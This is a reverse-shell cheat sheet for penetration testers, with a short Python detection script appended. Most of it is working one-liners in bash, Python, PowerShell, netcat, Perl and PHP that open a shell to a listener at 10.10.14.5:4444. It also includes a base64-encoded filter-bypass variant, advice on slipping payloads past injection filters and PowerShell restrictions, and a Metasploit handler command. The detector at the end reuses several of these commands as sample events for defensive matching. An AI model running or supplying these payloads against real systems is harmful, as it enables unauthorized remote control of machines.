Reverse Shells Cheat Sheet
One-liners and staged payloads for bash, Python, and PowerShell reverse shells during authorized penetration tests.
Overview
A reverse shell connects outbound from the target to your listener. Start a listener first (nc, rlwrap, or a Metasploit handler), then execute the appropriate one-liner for the target OS and available interpreter.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
Listener (attacker)
sudo apt install -y netcat-openbsd rlwrap
rlwrap nc -lvnp 4444
Upgrade shell after connect
python3 -c 'import pty;pty.spawn("/bin/bash")'
Essential commands
Attacker listener
nc -lvnp 4444
rlwrap -cAr nc -lvnp 4444
msf handler
msfconsole -q -x "use exploit/multi/handler; set payload linux/x64/shell_reverse_tcp; set LHOST 10.10.14.5; set LPORT 4444; run"
Common workflows
TCP bash
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
Bash 196
0<&196;exec 196<>/dev/tcp/10.10.14.5/4444; sh <&196 >&196 2>&196
Bash with base64 (filter bypass)
bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41LzQ0NDQgMD4mMQ==' | base64 -d | bash
Python 3
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
Python 2
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
PowerShell reverse TCP (Windows target)
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('10.10.14.5',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([Text.Encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length)}"
Encoded (shorter on cmdline)
powershell -e BASE64_ENCODED_COMMAND
nc traditional
nc -e /bin/sh 10.10.14.5 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f
Perl
perl -e 'use Socket;$i="10.10.14.5";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PHP
php -r '$sock=fsockopen("10.10.14.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
On target (after bare shell)
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Flags reference
| LHOST / IP | Your VPN/tun0 IP reachable from target |
|---|---|
| LPORT | Listener port (443/80 less filtered) |
| rlwrap | Readline for job control |
| msfvenom -f elf/exe/ps1 | Staged payloads vs one-liners |
| Firewall | Outbound rules may block; try 53, 443 |
Tips
- Prefer reverse over bind when target is behind NAT; bind when you are inbound to target.
- URL-encode one-liners in web injection; watch for &, quotes, length limits.
- PowerShell Constrained Language may block iex — try alternatives (mshta, certutil download).
- Upgrade to meterpreter or socat for full TTY: socat file:`tty`,raw,echo=0 tcp-listen:4444.
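
The one-liners in this cheat sheet leave recognizable command-line signatures, so the sketch below (an added example, not part of the original cheat sheet) matches them in process-creation records and decodes a payload piped through `base64 -d` before matching. The rule names, the `classify` and `scan` functions and the `SAMPLE_EVENTS` records are constructed for illustration.

```python
import base64
import re

# Signatures drawn from the one-liners on this page; rule names are illustrative.
RULES = {
    "dev_tcp_redirect": re.compile(r"/dev/tcp/[\w.\-]+/\d+"),
    "socket_dup2_shell": re.compile(r"socket.*connect\(.*dup2\(", re.S),
    "nc_exec_shell": re.compile(r"\bnc(?:at)?\b.*\s-e\s+\S*sh\b"),
    "mkfifo_nc_pipe": re.compile(r"mkfifo\s+\S+.*\|\s*\S*sh\b.*\|\s*nc\b"),
    "ps_tcpclient": re.compile(r"Net\.Sockets\.TCPClient", re.I),
    "ps_encoded_cmd": re.compile(r"powershell\S*\s.*-e(?:nc\w*)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "socket_exec_sh": re.compile(r"(?:sockaddr_in|fsockopen)\(.*/bin/sh", re.S),
    "pty_upgrade": re.compile(r"pty\.spawn\("),
}
# A base64 literal piped into `base64 -d`, as in the "filter bypass" variant.
B64_PIPE = re.compile(r"([A-Za-z0-9+/]{24,}={0,2})['\"]?\s*\|\s*base64\s+(?:-d|--decode)\b")


def classify(cmdline):
    """Return the sorted names of all rules matching one process command line."""
    texts = [cmdline]
    for blob in B64_PIPE.findall(cmdline):
        try:  # inspect the decoded payload as well as the wrapper command
            texts.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:
            pass  # not valid base64; the wrapper text is still checked
    return sorted({n for n, rx in RULES.items() if any(rx.search(t) for t in texts)})


# Constructed process-creation records (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("web01", "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"),
    ("web01", "echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41LzQ0NDQgMD4mMQ==' | base64 -d | bash"),
    ("db02", "nc -zv 10.0.0.8 5432"),
    ("db02", "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f"),
    ("ci03", "python3 -m http.server 8000"),
]


def scan(events):
    """Return (host, rule names) for every event that matches at least one rule."""
    return [(h, hits) for h, cmd in events if (hits := classify(cmd))]


if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS):
        print(host, ",".join(hits))
```

Feed it command lines from auditd execve records or Sysmon process-creation events. Command-line matching misses payloads run from files or memory, so pair it with outbound-connection monitoring for shell and interpreter processes.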